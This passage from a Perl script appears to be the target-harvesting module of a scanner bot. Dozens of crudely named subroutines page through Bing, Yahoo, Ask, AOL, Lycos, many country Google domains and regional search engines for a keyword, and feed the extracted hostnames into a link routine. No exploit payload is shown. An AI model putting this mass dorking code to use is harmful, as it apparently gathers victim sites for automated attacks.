  7111.         for (my $i=1; $i<=1000; $i+=100) {
  7112.  
  7113.                 my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  7114.  
  7115.                 my $res = search_engine_query($search);
  7116.  
  7117.                 while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  7118.  
  7119.             my $link = $1;
  7120.  
  7121.                         if ($link !~ /ask\.com/){
  7122.  
  7123.                                 my @grep = &links($link);
  7124.  
  7125.                                 push(@list,@grep);
  7126.  
  7127.                         }
  7128.  
  7129.                 }
  7130.  
  7131.         }
  7132.  
  7133.         return @list;
  7134.  
  7135. }
  7136.  
  7137.  
  7138.  
  7139. sub nennen() {
  7140.  
  7141.         my @list;
  7142.  
  7143.         my $key = $_[0];
  7144.  
  7145.         my $b   = 0;
  7146.  
  7147.         for ($b=1; $b<=400; $b+=10) {
  7148.  
  7149.                 my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
  7150.  
  7151.                 my $res = search_engine_query($search);
  7152.  
  7153.                 while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
  7154.  
  7155.                         my $link = $1;
  7156.  
  7157.                         if ($link !~ /onet|webcache|query/){
  7158.  
  7159.                                 my @grep = &links($link);
  7160.  
  7161.                 push(@list,@grep);
  7162.  
  7163.                         }
  7164.  
  7165.                 }
  7166.  
  7167.         }
  7168.  
  7169.         return @list;
  7170.  
  7171. }
  7172.  
  7173.  
  7174.  
  7175. sub susu() {
  7176.  
  7177.     my @list;
  7178.  
  7179.         my $key = $_[0];
  7180.  
  7181.     my $b   = 0;
  7182.  
  7183.         for ($b=10; $b<=200; $b+=10) {
  7184.  
  7185.         my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
  7186.  
  7187.         my $res = search_engine_query($search);
  7188.  
  7189.                 if ($res !~ /next/) {$b=100;}
  7190.  
  7191.         while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  7192.  
  7193.             my $link = $1;
  7194.  
  7195.             if ($1 !~ /yippy\.com/){
  7196.  
  7197.                 my @grep = &links($link);
  7198.  
  7199.                 push(@list,@grep);
  7200.  
  7201.             }
  7202.  
  7203.         }
  7204.  
  7205.     }
  7206.  
  7207.     return @list;
  7208.  
  7209. }
  7210.  
  7211.  
  7212.  
  7213. sub buahdada() {
  7214.  
  7215.     my @list;
  7216.  
  7217.     my $key = $_[0];
  7218.  
  7219.     for (my $i=1; $i<=400; $i+=10) {
  7220.  
  7221.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
  7222.  
  7223.         my $res = search_engine_query($search);
  7224.  
  7225.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  7226.  
  7227.                         my $link = $1;
  7228.  
  7229.             if ($link !~ /google/) {
  7230.  
  7231.                 my @grep = &links($link);
  7232.  
  7233.                 push(@list,@grep);
  7234.  
  7235.             }
  7236.  
  7237.         }
  7238.  
  7239.     }
  7240.  
  7241.     return @list;
  7242.  
  7243. }
  7244.  
  7245.  
  7246.  
  7247. sub payudara(){
  7248.  
  7249.     my @list;
  7250.  
  7251.         my $key = $_[0];
  7252.  
  7253.         for ($b=1; $b<=50; $b+=1) {
  7254.  
  7255.         my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
  7256.  
  7257.         my $res = search_engine_query($search);
  7258.  
  7259.                 if ($res !~ m/Next/i) {$b=50;}
  7260.  
  7261.         while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  7262.  
  7263.             my $link = $1;
  7264.  
  7265.             if ($1 !~ /\.sapo\.pt/){
  7266.  
  7267.                 my @grep = &links($link);
  7268.  
  7269.                 push(@list,@grep);
  7270.  
  7271.             }
  7272.  
  7273.         }
  7274.  
  7275.     }
  7276.  
  7277.     return @list;
  7278.  
  7279. }
  7280.  
  7281.  
  7282.  
  7283. sub kentot() {
  7284.  
  7285.   my @list;
  7286.  
  7287.   my $key = $_[0];
  7288.  
  7289.     for ($b=0; $b<=50; $b+=1) {
  7290.  
  7291.         my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
  7292.  
  7293.         my $res = search_engine_query($search);
  7294.  
  7295.         while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
  7296.  
  7297.             my $link = $1;
  7298.  
  7299.             if ($link !~ /lycos\.com/){
  7300.  
  7301.                 my @grep = &links($link);
  7302.  
  7303.                 push(@list,@grep);
  7304.  
  7305.             }
  7306.  
  7307.         }
  7308.  
  7309.     }
  7310.  
  7311.     return @list;      
  7312.  
  7313. }
  7314.  
  7315.  
  7316.  
  7317. sub emel() {
  7318.  
  7319.         my @list;
  7320.  
  7321.         my $key = $_[0];
  7322.  
  7323.     for ($b=0; $b<=1000; $b+=10) {
  7324.  
  7325.         my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
  7326.  
  7327.         my $res = search_engine_query($search);
  7328.  
  7329.                 if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
  7330.  
  7331.         while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
  7332.  
  7333.             my $link = $1;
  7334.  
  7335.             if ($link !~ /uol\.com\.br|\/web/i){
  7336.  
  7337.                 my @grep = &links($link);
  7338.  
  7339.                 push(@list,@grep);
  7340.  
  7341.             }
  7342.  
  7343.         }
  7344.  
  7345.     }
  7346.  
  7347.     return @list;
  7348.  
  7349. }
  7350.  
  7351.  
  7352.  
  7353. sub oral() {
  7354.  
  7355.   my @list;
  7356.  
  7357.   my $key = $_[0];
  7358.  
  7359.     for ($b=0; $b<=50; $b+=1) {
  7360.  
  7361.         my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
  7362.  
  7363.         my $res = search_engine_query($search);
  7364.  
  7365.                 if ($res =~ m/had no web result/i) {$b=50;}
  7366.  
  7367.         while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
  7368.  
  7369.             my $link = $1;
  7370.  
  7371.             if ($link !~ /hotbot\.com/){
  7372.  
  7373.                 my @grep = &links($link);
  7374.  
  7375.                 push(@list,@grep);
  7376.  
  7377.             }
  7378.  
  7379.         }
  7380.  
  7381.     }
  7382.  
  7383.     return @list;      
  7384.  
  7385. }
  7386.  
  7387.  
  7388.  
  7389. sub klitoris() {
  7390.  
  7391.         my @list;
  7392.  
  7393.         my $key = $_[0];
  7394.  
  7395.         for ($b=0; $b<=300; $b+=10) {
  7396.  
  7397.                 my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
  7398.  
  7399.                 my $res = search_engine_query($search);
  7400.  
  7401.                 while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  7402.  
  7403.                         my $link = $1;
  7404.  
  7405.                         if ($link !~ /aol\.com/){
  7406.  
  7407.                                 my @grep = &links($link);
  7408.  
  7409.                                 push(@list,@grep);
  7410.  
  7411.                         }
  7412.  
  7413.                 }
  7414.  
  7415.         }
  7416.  
  7417.         return @list;
  7418.  
  7419. }
  7420.  
  7421.  
  7422.  
  7423. sub masturbasi() {
  7424.  
  7425.   my @list;  
  7426.  
  7427.   my $key = $_[0];  
  7428.  
  7429.   for ($b=1; $b<=500; $b+=10) {
  7430.  
  7431.   #  $num += $num;
  7432.  
  7433.     my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
  7434.  
  7435.     my $res = search_engine_query($search);
  7436.  
  7437.     while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
  7438.  
  7439.             my $link = $1;
  7440.  
  7441.         if ($link !~ /biglobe/){
  7442.  
  7443.                 my @grep = &links($link);
  7444.  
  7445.                 push(@list,@grep);
  7446.  
  7447.             }
  7448.  
  7449.         }
  7450.  
  7451.     }
  7452.  
  7453.     return @list;
  7454.  
  7455. }
  7456.  
  7457.  
  7458.  
  7459. sub onani() {
  7460.  
  7461.   my @list;
  7462.  
  7463.   my $key = $_[0];
  7464.  
  7465.   my $b   = 0;
  7466.  
  7467.   my @doms = ("nl","au","br","ca","de","es","fr","it","uk");
  7468.  
  7469.   foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
  7470.  
  7471.     for (my $i=1; $i<=1000; $i+=100) {
  7472.  
  7473.         my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  7474.  
  7475.         my $res = search_engine_query($search);
  7476.  
  7477.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  7478.  
  7479.             if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  7480.  
  7481.                 }
  7482.  
  7483.             }
  7484.  
  7485.         } return @list;
  7486.  
  7487.     }
  7488.  
  7489. }
  7490.  
  7491.  
  7492.  
  7493. sub sperma() {
  7494.  
  7495.     my @list;
  7496.  
  7497.     my $key = $_[0];
  7498.  
  7499.     for (my $i=10; $i<=1000; $i+=100){
  7500.  
  7501.         my $search = ("http://www.kvasir.no/alle?offset=".$i."&q=".uri_escape($key)."");
  7502.  
  7503.         my $res = search_engine_query($search);
  7504.  
  7505.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  7506.  
  7507.             my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  7508.  
  7509.             }
  7510.  
  7511.         }
  7512.  
  7513.     }
  7514.  
  7515.     return @list;
  7516.  
  7517. }
  7518.  
  7519.  
  7520.  
  7521. sub anal() {
  7522.  
  7523.     my @lst;
  7524.  
  7525.     my $key = $_[0];
  7526.  
  7527.     for (my $i=0; $i<=50; $i+=1){
  7528.  
  7529.         my $search = ("http://zuhrina.com/google/search.php?q=".uri_escape($key)."&num=100&filter=N&start=".$i."&sa=N");
  7530.  
  7531.         my $res = search_engine_query($search);
  7532.  
  7533.         while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
  7534.  
  7535.             my $link = $1;
  7536.  
  7537.             if ($link !~ /google/){
  7538.  
  7539.                 my @grep = &links($link);
  7540.  
  7541.                 push(@lst,@grep);
  7542.  
  7543.             }
  7544.  
  7545.         }
  7546.  
  7547.     }
  7548.  
  7549.     return @lst;
  7550.  
  7551.  }  
  7552.  
  7553.        
  7554.  
  7555.                
  7556.  
  7557. sub puting() {
  7558.  
  7559.     my @list;
  7560.  
  7561.     my $key = $_[0];
  7562.  
  7563.     for ($b=1; $b<=1000; $b+=100) {
  7564.  
  7565.         my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
  7566.  
  7567.         my $res = search_engine_query($search);
  7568.  
  7569.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
  7570.  
  7571.             if ($1 !~ /seznam/){
  7572.  
  7573.             my $link = $1;
  7574.  
  7575.                 my @grep = &links($link);
  7576.  
  7577.                 push(@list,@grep);
  7578.  
  7579.             }
  7580.  
  7581.         }
  7582.  
  7583.     }
  7584.  
  7585.     return @list;
  7586.  
  7587. }
  7588.  
  7589.  
  7590.  
  7591. sub vagina(){
  7592.  
  7593.     my @list;
  7594.  
  7595.     my $key = $_[0];
  7596.  
  7597.     my $i   = 0;
  7598.  
  7599.     for ($i=0; $i<=100; $i+=1){
  7600.  
  7601.         my $web=("http://startgoogle.startpagina.nl/index.php?q=".uri_escape($key)."&start=".$i."&origin=homepage&source=geentaal");          
  7602.  
  7603.         my $Res= search_engine_query($web);
  7604.  
  7605.         while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  7606.  
  7607.             if ($1 !~ /pagina|pagina's/){
  7608.  
  7609.                 my $k=$1;
  7610.  
  7611.                 my @grep=&links($k);
  7612.  
  7613.                 push(@list,@grep);
  7614.  
  7615.             }
  7616.  
  7617.         }
  7618.  
  7619.     }
  7620.  
  7621.     return @list;
  7622.  
  7623. }
  7624.  
  7625.  
  7626.  
  7627. sub penis(){
  7628.  
  7629.         my @list;
  7630.  
  7631.         my $key = $_[0];
  7632.  
  7633.         for($b=1;$b<=1000;$b+=100){
  7634.  
  7635.                 my $Th=("http://www.google.pt/search?q=".uri_escape($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b."");
  7636.  
  7637.                 my $Res=search_engine_query($Th);
  7638.  
  7639.                 while($Res =~ m/href=\"http:\/\/(.+?)\//g){
  7640.  
  7641.                         my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  7642.  
  7643.                 }
  7644.  
  7645.         }
  7646.  
  7647. return @list;
  7648.  
  7649. }
  7650.  
  7651.  
  7652.  
  7653.  sub ZuhRina() {
  7654.  
  7655.     my @list;
  7656.  
  7657.     my $key = $_[0];
  7658.  
  7659.     for (my $i=0; $i<=1000; $i+=100){
  7660.  
  7661.         my $search = ("http://zuhrina.com/google/search.php?q=".uri_escape($key)."&num=100&filter=N&start=".$i."&sa=N");
  7662.  
  7663.         my $res = &search_engine_query($search);
  7664.  
  7665.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7666.  
  7667.             my $link = $1;
  7668.  
  7669.             if ($link !~ /google/){
  7670.  
  7671.                 my @grep = &links($link);
  7672.  
  7673.                 push(@list,@grep);
  7674.  
  7675.             }
  7676.  
  7677.         }
  7678.  
  7679.     }
  7680.  
  7681.     return @list;
  7682.  
  7683. }
  7684.  
  7685.  
  7686.  
  7687. sub memek() {
  7688.  
  7689.   my @list;
  7690.  
  7691.     my $key = $_[0];
  7692.  
  7693.     for (my $i=1; $i<=50; $i+=1) {
  7694.  
  7695.         my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
  7696.  
  7697.         my $res = search_engine_query($search);
  7698.  
  7699.                 if ($res !~ /Successiva/) {$i=50;}
  7700.  
  7701.         while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
  7702.  
  7703.             if ($1 !~ /ask\.com/){
  7704.  
  7705.             my $link = $1;
  7706.  
  7707.                 my @grep = &links($link);
  7708.  
  7709.                 push(@list,@grep);
  7710.  
  7711.             }
  7712.  
  7713.         }
  7714.  
  7715.     }
  7716.  
  7717.     return @list;
  7718.  
  7719. }
  7720.  
  7721.  
  7722.  
  7723. sub googleCA() {
  7724.  
  7725.     my @list;
  7726.  
  7727.     my $key = $_[0];
  7728.  
  7729.     for (my $i=0; $i<=1000; $i+=100){
  7730.  
  7731.         my $search = ("http://www.google.ca/search?q=".uri_escape($key)."&hl=&cr=countryCA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7732.  
  7733.         my $res = &search_engine_query($search);
  7734.  
  7735.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7736.  
  7737.             my $link = $1;
  7738.  
  7739.             if ($link !~ /googleCA/){
  7740.  
  7741.                 my @grep = &links($link);
  7742.  
  7743.                 push(@list,@grep);
  7744.  
  7745.             }
  7746.  
  7747.         }
  7748.  
  7749.     }
  7750.  
  7751.     return @list;
  7752.  
  7753. }
  7754.  
  7755.  
  7756.  
  7757. sub googleDE() {
  7758.  
  7759.     my @list;
  7760.  
  7761.     my $key = $_[0];
  7762.  
  7763.     for (my $i=0; $i<=1000; $i+=100){
  7764.  
  7765.         my $search = ("http://www.google.de/search?q=".uri_escape($key)."&hl=&cr=countryDE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7766.  
  7767.         my $res = &search_engine_query($search);
  7768.  
  7769.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7770.  
  7771.             my $link = $1;
  7772.  
  7773.             if ($link !~ /googleDE/){
  7774.  
  7775.                 my @grep = &links($link);
  7776.  
  7777.                 push(@list,@grep);
  7778.  
  7779.             }
  7780.  
  7781.         }
  7782.  
  7783.     }
  7784.  
  7785.     return @list;
  7786.  
  7787. }
  7788.  
  7789.  
  7790.  
  7791. sub googleUK() {
  7792.  
  7793.     my @list;
  7794.  
  7795.     my $key = $_[0];
  7796.  
  7797.     for (my $i=0; $i<=1000; $i+=100){
  7798.  
  7799.         my $search = ("http://www.google.co.uk/search?q=".uri_escape($key)."&hl=&cr=countryUK&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7800.  
  7801.         my $res = &search_engine_query($search);
  7802.  
  7803.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7804.  
  7805.             my $link = $1;
  7806.  
  7807.             if ($link !~ /googleUK/){
  7808.  
  7809.                 my @grep = &links($link);
  7810.  
  7811.                 push(@list,@grep);
  7812.  
  7813.             }
  7814.  
  7815.         }
  7816.  
  7817.     }
  7818.  
  7819.     return @list;
  7820.  
  7821. }
  7822.  
  7823.  
  7824.  
  7825. sub googleFR() {
  7826.  
  7827.     my @list;
  7828.  
  7829.     my $key = $_[0];
  7830.  
  7831.     for (my $i=0; $i<=1000; $i+=100){
  7832.  
  7833.         my $search = ("http://www.google.fr/search?q=".uri_escape($key)."&hl=&cr=countryFR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7834.  
  7835.         my $res = &search_engine_query($search);
  7836.  
  7837.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7838.  
  7839.             my $link = $1;
  7840.  
  7841.             if ($link !~ /googleFR/){
  7842.  
  7843.                 my @grep = &links($link);
  7844.  
  7845.                 push(@list,@grep);
  7846.  
  7847.             }
  7848.  
  7849.         }
  7850.  
  7851.     }
  7852.  
  7853.     return @list;
  7854.  
  7855. }
  7856.  
  7857.  
  7858.  
  7859. sub googleES() {
  7860.  
  7861.     my @list;
  7862.  
  7863.     my $key = $_[0];
  7864.  
  7865.     for (my $i=0; $i<=1000; $i+=100){
  7866.  
  7867.         my $search = ("http://www.google.es/search?q=".uri_escape($key)."&hl=&cr=countryES&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7868.  
  7869.         my $res = &search_engine_query($search);
  7870.  
  7871.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7872.  
  7873.             my $link = $1;
  7874.  
  7875.             if ($link !~ /googleES/){
  7876.  
  7877.                 my @grep = &links($link);
  7878.  
  7879.                 push(@list,@grep);
  7880.  
  7881.             }
  7882.  
  7883.         }
  7884.  
  7885.     }
  7886.  
  7887.     return @list;
  7888.  
  7889. }
  7890.  
  7891.  
  7892.  
  7893. sub googleIT() {
  7894.  
  7895.     my @list;
  7896.  
  7897.     my $key = $_[0];
  7898.  
  7899.     for (my $i=0; $i<=1000; $i+=100){
  7900.  
  7901.         my $search = ("http://www.google.it/search?q=".uri_escape($key)."&hl=&cr=countryIT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7902.  
  7903.         my $res = &search_engine_query($search);
  7904.  
  7905.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7906.  
  7907.             my $link = $1;
  7908.  
  7909.             if ($link !~ /googleIT/){
  7910.  
  7911.                 my @grep = &links($link);
  7912.  
  7913.                 push(@list,@grep);
  7914.  
  7915.             }
  7916.  
  7917.         }
  7918.  
  7919.     }
  7920.  
  7921.     return @list;
  7922.  
  7923. }
  7924.  
  7925. sleep(1);
  7926.  
  7927. sub googleNL() {
  7928.  
  7929.     my @list;
  7930.  
  7931.     my $key = $_[0];
  7932.  
  7933.     for (my $i=0; $i<=1000; $i+=100){
  7934.  
  7935.         my $search = ("http://www.google.nl/search?q=".uri_escape($key)."&hl=&cr=countryNL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7936.  
  7937.         my $res = &search_engine_query($search);
  7938.  
  7939.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7940.  
  7941.             my $link = $1;
  7942.  
  7943.             if ($link !~ /googleNL/){
  7944.  
  7945.                 my @grep = &links($link);
  7946.  
  7947.                 push(@list,@grep);
  7948.  
  7949.             }
  7950.  
  7951.         }
  7952.  
  7953.     }
  7954.  
  7955.     return @list;
  7956.  
  7957. }
  7958.  
  7959.  
  7960.  
  7961. sub googleBE() {
  7962.  
  7963.     my @list;
  7964.  
  7965.     my $key = $_[0];
  7966.  
  7967.     for (my $i=0; $i<=1000; $i+=100){
  7968.  
  7969.         my $search = ("http://www.google.be/search?q=".uri_escape($key)."&hl=&cr=countryBE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  7970.  
  7971.         my $res = &search_engine_query($search);
  7972.  
  7973.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7974.  
  7975.             my $link = $1;
  7976.  
  7977.             if ($link !~ /googleBE/){
  7978.  
  7979.                 my @grep = &links($link);
  7980.  
  7981.                 push(@list,@grep);
  7982.  
  7983.             }
  7984.  
  7985.         }
  7986.  
  7987.     }
  7988.  
  7989.     return @list;
  7990.  
  7991. }
  7992.  
  7993.  
  7994.  
  7995. sub googleCH() {
  7996.  
  7997.     my @list;
  7998.  
  7999.     my $key = $_[0];
  8000.  
  8001.     for (my $i=0; $i<=1000; $i+=100){
  8002.  
  8003.         my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8004.  
  8005.         my $res = &search_engine_query($search);
  8006.  
  8007.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8008.  
  8009.             my $link = $1;
  8010.  
  8011.             if ($link !~ /googleCH/){
  8012.  
  8013.                 my @grep = &links($link);
  8014.  
  8015.                 push(@list,@grep);
  8016.  
  8017.             }
  8018.  
  8019.         }
  8020.  
  8021.     }
  8022.  
  8023.     return @list;
  8024.  
  8025. }
  8026.  
  8027. sleep(1);
  8028.  
  8029. sub googleSE() {
  8030.  
  8031.     my @list;
  8032.  
  8033.     my $key = $_[0];
  8034.  
  8035.     for (my $i=0; $i<=1000; $i+=100){
  8036.  
  8037.         my $search = ("http://www.google.se/search?q=".uri_escape($key)."&hl=&cr=countrySE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8038.  
  8039.         my $res = &search_engine_query($search);
  8040.  
  8041.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8042.  
  8043.             my $link = $1;
  8044.  
  8045.             if ($link !~ /googleSE/){
  8046.  
  8047.                 my @grep = &links($link);
  8048.  
  8049.                 push(@list,@grep);
  8050.  
  8051.             }
  8052.  
  8053.         }
  8054.  
  8055.     }
  8056.  
  8057.     return @list;
  8058.  
  8059. }
  8060.  
  8061.  
  8062.  
  8063. sub googleDK() {
  8064.  
  8065.     my @list;
  8066.  
  8067.     my $key = $_[0];
  8068.  
  8069.     for (my $i=0; $i<=1000; $i+=100){
  8070.  
  8071.         my $search = ("http://www.google.dk/search?q=".uri_escape($key)."&hl=&cr=countryDK&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8072.  
  8073.         my $res = &search_engine_query($search);
  8074.  
  8075.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8076.  
  8077.             my $link = $1;
  8078.  
  8079.             if ($link !~ /googleDK/){
  8080.  
  8081.                 my @grep = &links($link);
  8082.  
  8083.                 push(@list,@grep);
  8084.  
  8085.             }
  8086.  
  8087.         }
  8088.  
  8089.     }
  8090.  
  8091.     return @list;
  8092.  
  8093. }
  8094.  
  8095.  
  8096.  
  8097. sub googleNO() {
  8098.  
  8099.     my @list;
  8100.  
  8101.     my $key = $_[0];
  8102.  
  8103.     for (my $i=0; $i<=1000; $i+=100){
  8104.  
  8105.         my $search = ("http://www.google.no/search?q=".uri_escape($key)."&hl=&cr=countryNO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8106.  
  8107.         my $res = &search_engine_query($search);
  8108.  
  8109.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8110.  
  8111.             my $link = $1;
  8112.  
  8113.             if ($link !~ /googleNO/){
  8114.  
  8115.                 my @grep = &links($link);
  8116.  
  8117.                 push(@list,@grep);
  8118.  
  8119.             }
  8120.  
  8121.         }
  8122.  
  8123.     }
  8124.  
  8125.     return @list;
  8126.  
  8127. }
  8128.  
  8129. sleep(1);
  8130.  
  8131. sub googleNZ() {
  8132.  
  8133.     my @list;
  8134.  
  8135.     my $key = $_[0];
  8136.  
  8137.     for (my $i=0; $i<=1000; $i+=100){
  8138.  
  8139.         my $search = ("http://www.google.co.nz/search?q=".uri_escape($key)."&hl=&cr=countryNZ&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8140.  
  8141.         my $res = &search_engine_query($search);
  8142.  
  8143.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8144.  
  8145.             my $link = $1;
  8146.  
  8147.             if ($link !~ /googleNZ/){
  8148.  
  8149.                 my @grep = &links($link);
  8150.  
  8151.                 push(@list,@grep);
  8152.  
  8153.             }
  8154.  
  8155.         }
  8156.  
  8157.     }
  8158.  
  8159.     return @list;
  8160.  
  8161. }
  8162.  
  8163.  
  8164.  
  8165. sub googleIE() {
  8166.  
  8167.     my @list;
  8168.  
  8169.     my $key = $_[0];
  8170.  
  8171.     for (my $i=0; $i<=1000; $i+=100){
  8172.  
  8173.         my $search = ("http://www.google.ie/search?q=".uri_escape($key)."&hl=&cr=countryIE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8174.  
  8175.         my $res = &search_engine_query($search);
  8176.  
  8177.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8178.  
  8179.             my $link = $1;
  8180.  
  8181.             if ($link !~ /googleIE/){
  8182.  
  8183.                 my @grep = &links($link);
  8184.  
  8185.                 push(@list,@grep);
  8186.  
  8187.             }
  8188.  
  8189.         }
  8190.  
  8191.     }
  8192.  
  8193.     return @list;
  8194.  
  8195. }
  8196.  
  8197.  
  8198.  
  8199. sub googleBR() {
  8200.  
  8201.     my @list;
  8202.  
  8203.     my $key = $_[0];
  8204.  
  8205.     for (my $i=0; $i<=1000; $i+=100){
  8206.  
  8207.         my $search = ("http://www.google.com.br/search?q=".uri_escape($key)."&hl=&cr=countryBR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8208.  
  8209.         my $res = &search_engine_query($search);
  8210.  
  8211.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8212.  
  8213.             my $link = $1;
  8214.  
  8215.             if ($link !~ /google/){
  8216.  
  8217.                 my @grep = &links($link);
  8218.  
  8219.                 push(@list,@grep);
  8220.  
  8221.             }
  8222.  
  8223.         }
  8224.  
  8225.     }
  8226.  
  8227.     return @list;
  8228.  
  8229. }
  8230.  
  8231. sleep(2);
  8232.  
  8233. sub googleAR() {
  8234.  
  8235.     my @list;
  8236.  
  8237.     my $key = $_[0];
  8238.  
  8239.     for (my $i=0; $i<=1000; $i+=100){
  8240.  
  8241.         my $search = ("http://www.google.com.ar/search?q=".uri_escape($key)."&hl=&cr=countryAR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8242.  
  8243.         my $res = &search_engine_query($search);
  8244.  
  8245.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8246.  
  8247.             my $link = $1;
  8248.  
  8249.             if ($link !~ /googleAR/){
  8250.  
  8251.                 my @grep = &links($link);
  8252.  
  8253.                 push(@list,@grep);
  8254.  
  8255.             }
  8256.  
  8257.         }
  8258.  
  8259.     }
  8260.  
  8261.     return @list;
  8262.  
  8263. }
  8264.  
  8265.  
  8266.  
  8267. sub googleCO() {
  8268.  
  8269.     my @list;
  8270.  
  8271.     my $key = $_[0];
  8272.  
  8273.     for (my $i=0; $i<=1000; $i+=100){
  8274.  
  8275.         my $search = ("http://www.google.com.co/search?q=".uri_escape($key)."&hl=&cr=countryCO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8276.  
  8277.         my $res = &search_engine_query($search);
  8278.  
  8279.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8280.  
  8281.             my $link = $1;
  8282.  
  8283.             if ($link !~ /googleCO/){
  8284.  
  8285.                 my @grep = &links($link);
  8286.  
  8287.                 push(@list,@grep);
  8288.  
  8289.             }
  8290.  
  8291.         }
  8292.  
  8293.     }
  8294.  
  8295.     return @list;
  8296.  
  8297. }
  8298.  
  8299.  
  8300.  
  8301. sub googleCU() {
  8302.  
  8303.     my @list;
  8304.  
  8305.     my $key = $_[0];
  8306.  
  8307.     for (my $i=0; $i<=1000; $i+=100){
  8308.  
  8309.         my $search = ("http://www.google.com.cu/search?q=".uri_escape($key)."&hl=&cr=countryCU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8310.  
  8311.         my $res = &search_engine_query($search);
  8312.  
  8313.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8314.  
  8315.             my $link = $1;
  8316.  
  8317.             if ($link !~ /googleCU/){
  8318.  
  8319.                 my @grep = &links($link);
  8320.  
  8321.                 push(@list,@grep);
  8322.  
  8323.             }
  8324.  
  8325.         }
  8326.  
  8327.     }
  8328.  
  8329.     return @list;
  8330.  
  8331. }
  8332.  
  8333. sleep(2);
  8334.  
